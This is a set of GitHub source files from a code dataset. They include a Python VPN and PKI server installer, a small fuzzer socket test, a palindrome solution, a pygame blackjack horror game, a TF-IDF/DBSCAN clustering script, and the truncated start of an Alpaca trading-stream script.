write_dots=True, config=self.config)\n\n self.ejbca.openvpn = self.ovpn\n\n def init_prepare_install(self):\n \"\"\"\n Disable interfering services\n :return: \n \"\"\"\n Installer.init_prepare_install(self)\n\n # If VPN server was running, stop it now - easier port testing, minimal interference.\n self.ovpn.switch(stop=True)\n self.dnsmasq.switch(stop=True)\n self.nginx.switch(stop=True)\n self.ejabberd.switch(stop=True)\n self.vpnauth.switch(stop=True, ignore_error=True)\n self.php.switch(stop=True)\n\n def init_main_try(self):\n \"\"\"\n Main installer block, called from the global try:\n :return:\n \"\"\"\n self.full_reinstall = True\n self.init_config_new_install()\n self.init_services()\n self.ejbca.do_vpn = True\n\n # Get registration options and choose one - network call.\n self.reg_svc.load_auth_types()\n\n # Show email prompt and intro text only for new initializations.\n res = self.init_prompt_user()\n if res != 0:\n return self.return_code(res)\n\n # Disable services which may interfere installation.\n self.init_prepare_install()\n\n # System check proceeds (mem, network).\n # We do this even if we continue with previous registration, to have fresh view on the system.\n # Check if we have EJBCA resources on the drive\n res = self.init_test_environment()\n if res != 0:\n return self.return_code(res)\n\n # Determine if we have enough RAM for the work.\n # If not, a new swap file is created so the system has at least 2GB total memory space\n # for compilation & deployment.\n self.syscfg.install_epiper()\n res = self.install_check_memory(syscfg=self.syscfg)\n if res != 0:\n return self.return_code(res)\n\n # Update the OS.\n if not self.args.no_os_update:\n self.update_main_try()\n\n # Preferred LE method? If set...\n self.last_is_vpc = False\n\n # Lets encrypt reachability test, if preferred method is DNS - do only one attempt.\n # We test this to detect VPC also. If 443 is reachable, we are not in VPC\n res, args_le_preferred_method = self.init_le_vpc_check(self.get_args_le_verification(),\n self.get_args_vpc(), reg_svc=self.reg_svc)\n if res != 0:\n return self.return_code(res)\n\n # Firewall tuning\n self.ejbca.setup_os()\n self.ovpn.setup_os()\n\n # Test ports opened here...\n res = self.init_test_ports_pre_install()\n if res != 0:\n return self.return_code(res)\n\n # User registration may be multi-step process.\n res, new_config = self.init_enigma_registration()\n if res != 0:\n return self.return_code(res)\n\n # Custom hostname for EJBCA - not yet supported\n new_config.ejbca_hostname_custom = False\n new_config.is_private_network = self.last_is_vpc\n new_config.le_preferred_verification = args_le_preferred_method\n\n # Assign a new dynamic domain for the host\n res, self.domain_is_ok = self.init_domains_check(reg_svc=self.reg_svc)\n new_config = self.reg_svc.config\n if res != 0:\n return self.return_code(res)\n\n # Dump config\n conf_file = Core.write_configuration(new_config)\n self.tprint('New configuration was written to: %s\\n' % conf_file)\n\n # Certbot\n res = self.init_certbot()\n if res != 0:\n return self.return_code(res)\n\n # Database\n res = self.init_database()\n if res != 0:\n return self.return_code(res)\n\n # SoftHSMv1 reconfigure\n res = self.init_softhsm(new_config=new_config)\n if res != 0:\n return self.return_code(res)\n\n # EJBCA configuration\n res = self.init_install_ejbca(new_config=new_config)\n if res != 0:\n return self.return_code(res)\n\n # Generate new keys\n res = self.init_create_vpn_eb_keys()\n if res != 0:\n return self.return_code(res)\n\n # JBoss restart is needed - so it sees the new keys\n self.init_jboss_restart()\n\n # VPN setup - create CA, profiles, server keys, CRL\n self.init_ejbca_vpn()\n\n # phase 2 - post EJBCA install\n self.config = new_config\n self.init_main_phase_2_try()\n\n def init_main_phase_2_try(self):\n \"\"\"\n Next phase of the installation - post EJBCA install.\n :return: \n \"\"\"\n # LetsEncrypt enrollment\n self.init_le_subdomains()\n res = self.init_le_install()\n if res != 0:\n return self.return_code(res)\n\n # VPN server - install, configure, enable, start\n self.tprint('\\n\\nInstalling & configuring VPN server')\n self.init_vpn()\n self.init_supervisord()\n self.init_dnsmasq()\n self.init_nginx()\n self.init_vpnauth()\n self.init_privatespace_web()\n\n if self.is_cloud_enabled():\n self.init_nextcloud()\n self.init_ejabberd()\n\n self.init_nginx_start()\n self.init_vpn_start()\n self.init_dnsmasq_restart()\n\n self.tprint('')\n self.init_celebrate()\n self.cli_sleep(3)\n self.cli_separator()\n\n # Finalize, P12 file & final instructions\n new_p12 = self.ejbca.copy_p12_file()\n self.init_show_p12_info(new_p12=new_p12)\n\n # Generate VPN client for the admin. openvpn link will be emailed\n if self.full_reinstall:\n self.init_create_vpn_users()\n\n # Install to the OS - cron job & on boot service\n res = self.init_install_os_hooks()\n if res != 0:\n return self.return_code(res)\n\n # Test if main admin port of EJBCA is reachable - server is running. Public port needed for VPN config download\n self.init_test_ejbca_ports_reachability(check_public=True)\n\n self.cli_sleep(5)\n return self.return_code(0)\n\n def init_jboss_restart(self):\n \"\"\"\n Restarts jboss\n :return: \n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, JBoss restart skipped')\n return\n self.ejbca.jboss_restart()\n\n def init_ejbca_vpn(self):\n \"\"\"\n Configures EJBCA for use for VPN\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot prepare VPN vars')\n return\n\n ret = self.ejbca.vpn_create_ca()\n if ret != 0:\n raise errors.SetupError('Cannot create CA for the VPN')\n\n ret = self.ejbca.vpn_create_profiles()\n if ret != 0:\n raise errors.SetupError('Cannot create new identity profiles in EJBCA for VPN')\n\n time.sleep(2)\n ret = self.ejbca.vpn_create_server_certs()\n if ret != 0:\n raise errors.SetupError('Cannot create new certificate for VPN server')\n\n ret = self.ejbca.vpn_create_crl()\n if ret != 0:\n raise errors.SetupError('Cannot generate new CRL for the VPN')\n\n self.vpn_keys = self.ejbca.vpn_get_server_cert_paths()\n self.vpn_crl = self.ejbca.vpn_get_crl_path()\n self.vpn_client_config = self.ejbca.vpn_get_vpn_client_config_path()\n self.ejbca.vpn_install_cron()\n\n def init_vpn(self):\n \"\"\"\n Installs and configures VPN daemon.\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n self.ovpn.config = self.config\n\n ret = self.ovpn.install()\n if ret != 0:\n raise errors.SetupError('Cannot install openvpn package')\n\n ret = self.ovpn.generate_dh_group(self.full_reinstall)\n if ret != 0:\n raise errors.SetupError('Cannot generate a new DH group for VPN server')\n\n self.ovpn.configure_server()\n\n vpn_ca, vpn_cert, vpn_key = self.vpn_keys\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, VPN wont be configured properly')\n\n else:\n ret = self.ovpn.store_server_cert(ca=vpn_ca, cert=vpn_cert, key=vpn_key)\n if ret != 0:\n raise errors.SetupError('Cannot install VPN certificate+key to the VPN server')\n\n self.ovpn.configure_crl(crl_path=self.vpn_crl)\n\n # Configure VPN client configuration file to match the server config\n self.ovpn.client_config_path = self.vpn_client_config\n self.ovpn.configure_client()\n self.ejbca.jboss_fix_privileges()\n\n # OS configuration\n ret = self.ovpn.setup_os()\n if ret != 0:\n raise errors.SetupError('Cannot configure OS for the openvpn server (ip forwarding, masquerade)')\n\n # Starting VPN server\n ret = self.ovpn.enable()\n if ret != 0:\n raise errors.SetupError('Cannot set openvpn server to start after boot')\n\n Core.write_configuration(self.config)\n\n def init_vpn_start(self):\n \"\"\"\n Starts VPN server\n :return:\n \"\"\"\n if self.args.no_ejbca_install and self.full_reinstall:\n logger.warning('EJBCA disabled, VPN wont be started')\n return\n\n ret = self.ovpn.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Cannot start openvpn server')\n\n def init_dnsmasq(self):\n \"\"\"\n Initializes DNSMasq\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n self.dnsmasq.hostname = self.certificates.hostname\n self.dnsmasq.vpn_server_ip = self.ovpn.get_ip_vpn_server()\n\n ret = self.dnsmasq.install()\n if ret != 0:\n raise errors.SetupError('Error with dnsmasq installation')\n\n self.dnsmasq.configure_server()\n\n ret = self.dnsmasq.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting dnsmasq to start after boot')\n\n self.dnsmasq.switch(restart=True)\n\n def init_dnsmasq_restart(self):\n \"\"\"\n Restarts dns masq\n :return: \n \"\"\"\n ret = self.dnsmasq.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting dnsmasq daemon')\n\n def init_nginx(self):\n \"\"\"\n Initializes Nginx\n Throws an exception if something goes wrong.\n :return:\n \"\"\"\n self.nginx.hostname = self.certificates.hostname\n self.nginx.domains = self.config.domains\n self.nginx.internal_addresses = ['%s/%s' % (self.ovpn.get_ip_net(), self.ovpn.get_ip_net_size())]\n self.nginx.cert_dir = self.ejbca.cert_dir\n self.nginx.html_root = self.pspace_web.get_public_dir() # Laravel based private space landing page\n self.nginx.add_le_subdomains(self.certificates.subdomains)\n\n ret = self.nginx.install()\n if ret != 0:\n raise errors.SetupError('Error with nginx installation')\n\n # Loading basic info\n self.nginx.load_configuration()\n\n # Install PHP\n self.init_php()\n\n # Configure properly\n self.nginx.configure_server()\n\n # Use Nginx certbot plugin for renewal\n self.config.le_renew_nginx = True\n Core.write_configuration(self.config)\n\n ret = self.nginx.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting nginx to start after boot')\n\n def init_nginx_start(self):\n \"\"\"\n Starts Nginx\n Can start it after it is properly configured & PHP is installed\n :return: \n \"\"\"\n ret = self.nginx.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting nginx daemon')\n\n def init_php(self):\n \"\"\"\n Installs php\n :return: \n \"\"\"\n self.php.user = self.nginx.nginx_user\n self.php.install()\n self.php.configure()\n\n ret = self.php.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting php to start after boot')\n\n ret = self.php.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting php daemon')\n\n def init_privatespace_web(self):\n \"\"\"\n Initializes private space web\n :return: \n \"\"\"\n self.pspace_web.config = self.config\n self.pspace_web.user = self.nginx.nginx_user\n self.pspace_web.stats_file_path = self.vpnauth.get_stats_file_path()\n self.pspace_web.admin_email = self.config.email\n self.pspace_web.hostname = self.certificates.hostname\n self.pspace_web.vpn_net_addr = self.ovpn.get_ip_net()\n self.pspace_web.vpn_net_size = self.ovpn.get_ip_net_size()\n self.pspace_web.vpn_net_server = self.ovpn.get_ip_vpn_server()\n\n self.pspace_web.install()\n self.pspace_web.configure()\n Core.write_configuration(self.config)\n\n def init_supervisord(self):\n \"\"\"\n Installs supervisord\n :return:\n \"\"\"\n self.supervisord.install()\n\n ret = self.supervisord.enable()\n if ret != 0:\n raise errors.SetupError('Error with setting supervisord to start after boot')\n\n ret = self.supervisord.switch(restart=True)\n if ret != 0:\n raise errors.SetupError('Error in starting supervisord daemon')\n\n def init_vpnauth(self):\n \"\"\"\n Installs vpn auth server\n Has to be called after VPN is installed buf before VPN is started\n :return:\n \"\"\"\n self.vpnauth.config = self.config\n self.vpnauth.ejbca = self.ejbca\n\n self.vpnauth.install()\n self.vpnauth.configure()\n self.vpnauth.configure_vpn_server()\n Core.write_configuration(self.config)\n\n self.vpnauth.enable()\n self.vpnauth.switch(start=True)\n\n def init_create_vpn_eb_keys(self):\n \"\"\"\n Creates a new keys in the SoftHSM token -> EB.\n :return:\n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot generate keys')\n return 0\n\n self.tprint('\\nEnigma Bridge service will generate new keys:')\n ret, out, err = self.ejbca.pkcs11_generate_default_key_set(softhsm=self.soft_config)\n\n if ret != 0:\n self.tprint(self.t.red('\\nError generating new keys'))\n self.tprint('The installation has to be repeated later')\n\n self.tprint('\\nError from the command:')\n self.tprint(''.join(out))\n self.tprint('\\n')\n self.tprint(''.join(err))\n return 1\n return 0\n\n def init_create_vpn_users(self):\n \"\"\"\n Create default VPN users, final steps\n :return: \n \"\"\"\n if self.args.no_ejbca_install:\n logger.warning('EJBCA disabled, cannot create VPN users')\n return 0\n\n self.ejbca.vpn_create_user(self.config.email, 'default')\n token = self.ejbca.vpn_create_p12_otp()\n self.config.p12_otp_superadmin = token\n\n def init_install_os_hooks(self):\n \"\"\"\n Install OS hooks - cronjob for cert checking, on boot service for dynamic DNS\n :return: result\n \"\"\"\n install_type = 'vpn'\n self.syscfg.install_onboot_check(install_type=install_type)\n self.syscfg.install_cron_renew(install_type=install_type)\n self.syscfg.install_cron_update(install_type=install_type)\n return 0\n\n def reinstall_soft_body(self):\n \"\"\"\n Reinstallation after initial checks\n :return: \n \"\"\"\n self.vpn_keys = self.ejbca.vpn_get_server_cert_paths()\n self.vpn_crl = self.ejbca.vpn_get_crl_path()\n self.vpn_client_config = self.ejbca.vpn_get_vpn_client_config_path()\n self.full_reinstall = False\n self.nextcloud.doing_reinstall = True\n self.ovpn.doing_reinstall = True\n\n self.reinstall_ejbca()\n\n self.ovpn.load_from_config()\n\n ret = self.init_main_phase_2_try()\n if ret != 0:\n raise errors.SetupError('Reinstall failed')\n Core.write_configuration(self.config)\n\n return ret\n\n def restart_main(self):\n \"\"\"\n Restarts all services\n :return: \n \"\"\"\n Installer.restart_main(self)\n\n self.php.switch(restart=True)\n self.nginx.switch(restart=True)\n self.ovpn.switch(restart=True)\n self.ejabberd.switch(restart=True)\n self.dnsmasq.switch(restart=True)\n self.supervisord.switch(restart=True)\n self.vpnauth.switch(restart=True)\n\n def le_renewed(self):\n \"\"\"\n Letsencrypt was renewed\n :return: \n \"\"\"\n Installer.le_renewed(self)\n\n self.nginx.switch(restart=True)\n self.ejabberd.on_cert_renewed()\n\n def init_ejabberd(self):\n \"\"\"\n Installs ejabberd\n :return: \n \"\"\"\n self.ejabberd.config = self.config\n self.ejabberd.hostname = self.certificates.hostname\n self.ejabberd.extauth_token = self.config.nextcloud_jsxc_token\n self.ejabberd.extauth_endpoint = self.nextcloud.get_extauth_endpoint()\n\n self.ejabberd.install()\n self.ejabberd.configure()\n self.ejabberd.enable()\n\n def init_nextcloud(self):\n \"\"\"\n Initializes private space web\n :return: \n \"\"\"\n self.nextcloud.config = self.config\n self.nextcloud.user = self.nginx.nginx_user\n self.nextcloud.hostname = self.certificates.hostname\n\n self.nextcloud.install()\n self.nextcloud.configure()\n self.config.nextcloud_installed = True\n\n self.pspace_web.add_tile('Cloud', 'fa-cloud', self.nextcloud.get_link())\n Core.write_configuration(self.config)\n\n def is_cloud_enabled(self):\n \"\"\"\n Clud installation enabled\n :return: \n \"\"\"\n if self.args.cloud:\n return True\n if self.config is not None:\n return self.config.nextcloud_installed\n\n def init_le_subdomains(self):\n \"\"\"\n Init subdomains\n :return: \n \"\"\"\n Installer.init_le_subdomains(self)\n\n if self.is_cloud_enabled():\n self.nextcloud.config = self.config\n self.nextcloud.hostname = self.certificates.hostname\n\n subs = self.nextcloud.get_domains()\n self.certificates.add_subdomains(subs)\n self.certificates.register_subdomains()\n\n\ndef main():\n app = VpnInstaller()\n app.app_main()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"EnigmaBridge/ebstall.py","sub_path":"ebstall/clivpn.py","file_name":"clivpn.py","file_ext":"py","file_size_in_byte":30204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43073986737","text":"import socket\nfrom sender.message import Message, MessageType\nimport time\nfrom mutator import mutator\n\ndef test1():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"localhost\", 57001))\n s.close()\n msg = Message(MessageType.DEV_PATH, '/dev/null')\n data = msg.pack()\n print(data)\n s.send(data)\n msg = Message(MessageType.IOCTL, 13371337, 'ablablablablabala'.encode())\n data = msg.pack()\n print(data)\n s.send(data)\n time.sleep(1)\n s.close()\n\n\ndef test2():\n m = Mutator()\n\n\ntest2()\n","repo_name":"Thun0/dev-fuzz","sub_path":"vm_manager/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850212320","text":"# encoding=utf-8\n\nclass Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n sum = 0\n x_ = x\n while x_ > 0:\n sum = 10 * sum + x_ % 10\n x_ //= 10\n return sum == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome(12321))\n","repo_name":"feizhihui/LeetCode","sub_path":"page1/main9.py","file_name":"main9.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86698975663","text":"import pygame, time, random, spritesheethelper\nfrom spritesheethelper import SpriteStripAnim\nfrom playsound import playsound\nfrom pygame import mixer\npygame.init()\nmixer.init()\ncardslist = ['A', 'A', 'A', 'A', 'K', 'K', 'K', 'K', 'Q', 'Q', 'Q', 'Q', 'J', 'J', 'J', 'J', '10', '10', '10', '10', '9', '9', '9', '9', '8', '8', '8', '8', '7', '7', '7', '7', '6', '6', '6', '6', '5', '5', '5', '5', '4', '4', '4', '4', '3', '3', '3', '3', '2', '2', '2', '2']\ndeadcards = []\narea = 1\nminutes = 5\nseconds = 0\npygame.display.set_caption('Blackjack')\nscreen = pygame.display.set_mode((1000, 675))\n# = pygame.transform.scale(, (95, 30))\nmed_font = pygame.font.SysFont(\"Mochiy Pop One\", 30)\nfont_style = pygame.font.SysFont(\"Mochiy Pop One\", 50)\nsmall_font = pygame.font.SysFont(\"Mochiy Pop One\", 20)\nbig_font = pygame.font.SysFont(\"Mochiy Pop One\", 145)\nverybig_font = pygame.font.SysFont(\"Algerian\", 70)\nhuge_font = pygame.font.SysFont(\"Algerian\", 175)\nmenustarttext = verybig_font.render(\"START\", True, [0, 0, 0])\nmenuoptionstext = verybig_font.render(\"OPTIONS\", True, [0, 0, 0])\nmenuexittext = verybig_font.render(\"EXIT\", True, [0, 0, 0])\n\n\nsecondevent = pygame.USEREVENT + 1\npygame.time.set_timer(secondevent, 1000)\n\n\nstrips = [\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 350),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 2000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 3000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/spritesheet.png', (0,0,50,34), 5, None, False, 10)\n]\nfadestrips = [\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500),\n SpriteStripAnim('assets/jumpscares/fadespritesheet.png', (0,0,1000,675), 4, None, False, 500)\n]\n\npixintrostrips = [\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 8000),\n SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 4, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1500),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000),\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000)\n #SpriteStripAnim('assets/jumpscares/pixintrospritesheet.png', (0,0,1000,675), 8, None, False, 1000)\n]\nn = 0\nf = 0\ng = 0\nstrips[n].iter()\npixintrostrips[g].iter()\nimage = strips[n].next()\npixintroimage = pixintrostrips[g].next()\n#while True:\n #for e in pygame.event.get():\n #if e.type == pygame.KEYDOWN:\n #if e.key == pygame.K_ESCAPE:\n #exit()\n #elif e.key == pygame.K_RETURN:\n #n += 1\n #if n >= len(strips):\n #n = 0\n #strips[n].iter()\n #screen.fill(0, 0, 0)\n\n #screen.blit(pygame.transform.scale(image, (0,0)), [1000, 675])\n \n\n\ncards = [\n pygame.transform.scale(pygame.image.load('assets/cards/A.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/K.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/2.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/3.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/4.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/5.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/6.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/7.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/8.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/9.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/10.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/Q.png').convert_alpha(), (121, 199)),\n pygame.transform.scale(pygame.image.load('assets/cards/J.png').convert_alpha(), (121, 199))\n]\n\nmenu = pygame.image.load('assets/menu.png').convert_alpha()\n\ndef jumpscare(what, image, introimage=\"sus\"):\n # what is a cookie clicker reference\n x = 0\n for i in range(0, 3):\n screen.fill((255, 255, 255))\n #pygame.event.get()\n #screen.blit(fadeimage, (0, 0))\n pygame.display.update()\n time.sleep(0.1)\n screen.fill((0, 0, 0))\n pygame.display.update()\n time.sleep(0.1)\n\n if what == \"pix\":\n pixintroimage = introimage\n while True:\n pygame.event.get()\n screen.blit(pixintroimage, (0, 0))\n pygame.display.update()\n try: pixintroimage = pixintrostrips[g].next()\n except Exception as e:\n while True:\n pygame.event.get()\n x += 1\n if x == 1700: \n playsound('assets/audio/vannscream.mp3')\n image = pygame.transform.scale(image, [1000, 675])\n screen.blit(image, (0, 0))\n pygame.display.update()\n try: image = strips[n].next()\n except Exception as e: exit()\n\n\n\ndef placecards(card, x, y):\n try:\n screen.blit(cards[int(card)], [x, y])\n except: \n if card == \"A\": screen.blit(cards[0], [x, y])\n elif card == \"K\": screen.blit(cards[1], [x, y])\n elif card == \"Q\": screen.blit(cards[11], [x, y])\n elif card == \"J\": screen.blit(cards[12], [x, y])\n else: raise Exception(\"Could not display unknown card\")\n\n\ndef cardvalue(card):\n playercount = 0\n try:\n playercount += int(card)\n except:\n if card in \"KQJ\": playercount += 10\n elif card in \"A\":\n if playercount + 11 > 21: playercount += 1\n else: playercount += 11\n return playercount\n\n\n\n\n\nwhile True:\n screen.blit(menu, [0, 0])\n screen.blit(menustarttext, [20, 100])\n screen.blit(menuoptionstext, [20, 190])\n screen.blit(menuexittext, [20, 280])\n \n start = True\n \n \n pygame.display.update()\n \n\n time.sleep(2)\n \n shuffledcards = random.sample(cardslist, len(cardslist))\n playercards = [shuffledcards[0], shuffledcards[1]]\n playercount = 0\n playercardnumber = 0\n dealercount = 0\n dealercardnumber = 0\n \n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN: \n if event.key == pygame.K_ESCAPE: exit()\n\t\t#if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n if event.type == pygame.QUIT: exit()\n\n while start:\n \n \n \n playercount += cardvalue(shuffledcards[0])\n playercount += cardvalue(shuffledcards[1])\n dealercount += cardvalue(shuffledcards[2])\n dealercount += cardvalue(shuffledcards[3])\n #print(str(playercards) + \" \" + str(playercount))\n for event in pygame.event.get():\n if event.type == secondevent: \n seconds -= 1\n if seconds == -1: \n if minutes != 0:\n minutes -= 1; seconds = 59\n else:\n jumpscare(\"pix\", image, pixintroimage)\n\n\n #time.sleep(2)\n if area == -1: area = 1\n while area == 1:\n screen.fill([20, 20, 20])\n if len(str(seconds)) == 1:\n displayseconds = \"0\" + str(seconds)\n else: displayseconds = str(seconds)\n bgtimertext = huge_font.render(str(minutes) + \":\" + str(displayseconds), True, [50, 50, 50])\n playercounttext = big_font.render(str(playercount), True, [50, 50, 50])\n dealercounttext = big_font.render(str(dealercount), True, [50, 50, 50])\n screen.blit(bgtimertext, (250, 210))\n screen.blit(playercounttext, (210, 330))\n screen.blit(dealercounttext, (240, 80))\n\n placecards(shuffledcards[0], 400, 400)\n placecards(shuffledcards[1], 500, 415)\n\n placecards(shuffledcards[2], 360, 10)\n placecards(shuffledcards[3], 470, 45)\n\n for event in pygame.event.get():\n if event.type == secondevent: \n seconds -= 1\n if seconds == -1: \n if minutes != 0:\n minutes -= 1; seconds = 59\n else:\n jumpscare(\"pix\", image, pixintroimage)\n if event.type == pygame.KEYDOWN: \n if event.key == pygame.K_ESCAPE: exit()\n if event.key == pygame.K_1:\n playercardnumber += 1; placecards(shuffledcards[3 + playercardnumber], 500 + (110 * playercardnumber), 415 + (35 * playercardnumber)); playercount += cardvalue(shuffledcards[3 + playercardnumber]); print(playercount); \n pygame.display.update()\n if event.key == pygame.K_2:\n while dealercount < 17:\n dealercardnumber += 1; placecards(shuffledcards[10 + dealercardnumber], 470 + (100 * dealercardnumber), 45 + (15 * dealercardnumber)); dealercount += cardvalue(shuffledcards[10 + dealercardnumber])\n if shuffledcards[10 + dealercardnumber] == \"A\":\n if dealercount - 10 <= 21: dealercount -= 10\n #playercounttext = big_font.render(str(playercount), True, [50, 50, 50])\n #dealercounttext = big_font.render(str(dealercount), True, [50, 50, 50])\n #screen.blit(dealercounttext, (240, 80))\n #screen.blit(playercounttext, (210, 330))\n pygame.display.update()\n time.sleep(0.8)\n print(playercount)\n print(dealercount) \n while playercount > 21 or dealercount > playercount and dealercount <= 21: \n jumpscare(\"pix\", image, pixintroimage)\n \n if playercount == 21 or playercount > dealercount or dealercount > 21: print(\"win\"); exit()\n else: print(\"prose\")\n #if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n if event.type == pygame.QUIT: exit()\n while playercount > 21: \n jumpscare(\"pix\", image, pixintroimage)\n pygame.display.update()\n \n\n","repo_name":"wowbaseballgamesocool/blackjack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27613055822","text":"from textblob import TextBlob as tb #text Bynary Large Object\nfrom functools import reduce\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport random\n\n\ndocuments = (\n\"The sky is blue\",\n\"The sun is bright\",\n\"The sun in the sky is bright\",\n\"We can see the shining sun, the bright sun\",\n\"We can see the shining sku, the bright cloud\"\n)\n\n\ntfidf_vectorizer = TfidfVectorizer()\ntfidf_matrix = tfidf_vectorizer.fit_transform(documents)\nmatrix = []\n\nfor i, document in enumerate(documents):\n similarity = cosine_similarity(tfidf_matrix[i:i+1], tfidf_matrix)\n matrix.append((similarity.tolist(), i))\nn = 1\nepsilon = 0.5\n\n#first part \ndef selectRandom(k, list):\n random_select = []\n added = False\n for i in range(k):\n added = False\n while added == False:\n value = random.choice(list) \n if value not in random_select:\n random_select.append(value)\n added = True\n return random_select\n\nlista = selectRandom(n, matrix) # select random m amount of elements.\n\ndef regionScan(current_node, epsilon, matrix):\n neighbourPts = []\n node_position = current_node # get the position of the element in the \n for node in matrix:\n distance = node[0][0][node_position]\n if (1-distance) < epsilon: # inverse to obtain the right distance!\n print('adding node', node[1])\n neighbourPts.append(node[1])\n print(neighbourPts)\n return neighbourPts\n\ndef expandCluster(node, neighbour_nodes, clusters, c_n, epsilon, MinPts, matrix, visited):\n clusters[c_n].append(node[1])\n for n_node in neighbour_nodes:\n if n_node not in visited:\n visited.append(n_node)\n neighbour_node_2 = regionScan(n_node, epsilon, matrix)\n if len(neighbour_node_2) >= MinPts:\n for node_2 in neighbour_node_2:\n if node_2 not in neighbour_nodes:\n neighbour_nodes.append(node_2) \n if n_node not in (reduce(lambda x,y: x+y,clusters)):\n clusters[c_n].append(n_node)\n\n\ndef DBSCAN(matrix, epsilon, min_nodes):\n print('epsilon', epsilon)\n print('mnodes', min_nodes)\n noise = []\n visited = []\n clusters = []\n c_n = -1 #cluster number or position\n for node in matrix:\n if node[1] not in visited:\n visited.append(node[1])\n neighbour_nodes = regionScan(node[1], epsilon, matrix)\n if len(neighbour_nodes) < min_nodes:\n print('adding noise')\n noise.append(node[1])\n else:\n clusters.append([])\n c_n += 1\n expandCluster(node, neighbour_nodes, clusters, c_n,epsilon, min_nodes, matrix, visited)\n print(\"no. of clusters: \" , len(clusters))\n print(\"length of noise:\", len(noise))\n print(\"clusters \" , clusters)\n print(\"noise \" , noise)\n \n\nDBSCAN(matrix, 0.4, 2)\n","repo_name":"juancho618/data_analysis","sub_path":"cosine_matrix.py","file_name":"cosine_matrix.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574643502","text":"ivan = []\nkakita = []\nsoretin = []\ngordapapa = []\nelpeke = []\nivan.append(9)\nkakita.append (8)\nsoretin.append(10)\ngordapapa.append(6)\nivan.append(2)\nkakita.append (5)\nsoretin.append(-10)\ngordapapa.append(11)\ndef suma_jugadas (etiqueta):\n suma = 0\n i = 0\n while i 120:\n# print(f'sent {direction} trade')\n\n# To Stream prices\nws_url = 'wss://data.alpaca.markets'\nconn = tradeapi.stream2.StreamConn(\n api_key_id, api_secret, base_url=base_url, data_url=ws_url, data_stream='alpacadatav1'\n)\n\nprint(\"Bees Hunt\")\n@conn.on(r'^account_updates$')\nasync def 